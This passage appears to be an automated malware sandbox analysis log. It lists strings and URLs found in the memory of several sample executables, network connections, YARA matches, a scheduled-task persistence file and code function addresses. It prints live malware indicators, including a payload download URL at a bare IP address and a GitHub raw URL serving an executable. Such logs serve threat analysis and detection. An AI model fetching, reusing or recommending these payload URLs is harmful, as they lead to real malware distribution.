                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exei
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/iles/x3team/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                              Source: powershell.exe, 00000010.00000002.2697865269.0000000007357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                              Source: e56fffc2ce.exe, 0000000E.00000002.2875306579.0000000006660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2724345565.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: e56fffc2ce.exe, 0000000E.00000002.2875306579.0000000006660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                              Source: powershell.exe, 00000010.00000002.2686734514.0000000005905000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                              Source: powershell.exe, 00000010.00000002.2671093967.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2671093967.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000010.00000002.2671093967.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: zudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: powershell.exe, 00000010.00000002.2671093967.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004741000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: zudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/
                              Source: kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/accountname.aspx
                              Source: kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx
                              Source: zudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
                              Source: kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspxS
                              Source: kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                              Source: zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                              Source: powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                              Source: powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, e56fffc2ce.exe, 0000000E.00000000.2625265677.00000000008B2000.00000002.00000001.01000000.00000012.sdmp, e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe
                              Source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                              Source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2579288387.0000000003BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                              Source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                              Source: powershell.exe, 00000010.00000002.2669231961.000000000302A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                              Source: powershell.exe, 00000010.00000002.2686734514.0000000005905000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                              Source: e56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.0000000000788000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, zudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, zudFSfy.exe, 00000007.00000002.2478294311.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmp, kz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sci.libertyreserve.com/
                              Source: skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                              Source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                              Source: kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                              Source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49875 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49896 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49922 version: TLS 1.2
                              Source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_305b518e-8
                              Source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_88c59527-2
                              Source: Yara matchFile source: 22.3.svchost.exe.4d00000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.3.ac68c6b737.exe.51e0000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 22.3.svchost.exe.4ae0000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.3.ac68c6b737.exe.4fc0000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 22.3.svchost.exe.4d00000.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000003.2745831377.0000000004D00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000003.2745248461.0000000004AE0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ac68c6b737.exe PID: 5012, type: MEMORYSTR

                              System Summary

                              barindex
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: random[1].exe1.6.drStatic PE information: section name:
                              Source: random[1].exe1.6.drStatic PE information: section name: .idata
                              Source: random[1].exe1.6.drStatic PE information: section name:
                              Source: ac68c6b737.exe.6.drStatic PE information: section name:
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: .idata
                              Source: ac68c6b737.exe.6.drStatic PE information: section name:
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B8CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00B8CB97
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008278BB0_2_008278BB
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008270490_2_00827049
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008288600_2_00828860
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008231A80_2_008231A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F81010_2_008F8101
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B300_2_007E4B30
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E0_2_008F7B6E
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00822D100_2_00822D10
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4DE00_2_007E4DE0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082779B0_2_0082779B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00817F360_2_00817F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB78BB1_2_00BB78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB88601_2_00BB8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB70491_2_00BB7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB31A81_2_00BB31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B74B301_2_00B74B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B74DE01_2_00B74DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB2D101_2_00BB2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BB779B1_2_00BB779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00BA7F361_2_00BA7F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB78BB2_2_00BB78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB88602_2_00BB8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB70492_2_00BB7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB31A82_2_00BB31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B74B302_2_00B74B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B74DE02_2_00B74DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB2D102_2_00BB2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BB779B2_2_00BB779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BA7F362_2_00BA7F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B7E5306_2_00B7E530
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B961926_2_00B96192
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB88606_2_00BB8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B74B306_2_00B74B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B74DE06_2_00B74DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB2D106_2_00BB2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B90E136_2_00B90E13
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB70496_2_00BB7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB31A86_2_00BB31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B916026_2_00B91602
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB779B6_2_00BB779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BB78BB6_2_00BB78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B93DF16_2_00B93DF1
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BA7F366_2_00BA7F36
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_012523107_2_01252310
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01250F387_2_01250F38
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_0125215F7_2_0125215F
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_012520147_2_01252014
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_012520AA7_2_012520AA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01252C607_2_01252C60
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01252C5B7_2_01252C5B
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01250E8D7_2_01250E8D
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_012537407_2_01253740
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_012536487_2_01253648
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251B5F7_2_01251B5F
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251AFA7_2_01251AFA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251D697_2_01251D69
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251DEA7_2_01251DEA
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251CB17_2_01251CB1
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251FBF7_2_01251FBF
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_01251E9E7_2_01251E9E
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D114D87_2_04D114D8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D12C007_2_04D12C00
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D185287_2_04D18528
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D1109B7_2_04D1109B
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D110A07_2_04D110A0
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D130337_2_04D13033
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D130387_2_04D13038
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_04D119107_2_04D11910
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD0B907_2_09BD0B90
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD2CF87_2_09BD2CF8
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD7F707_2_09BD7F70
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 7_2_09BD9E987_2_09BD9E98
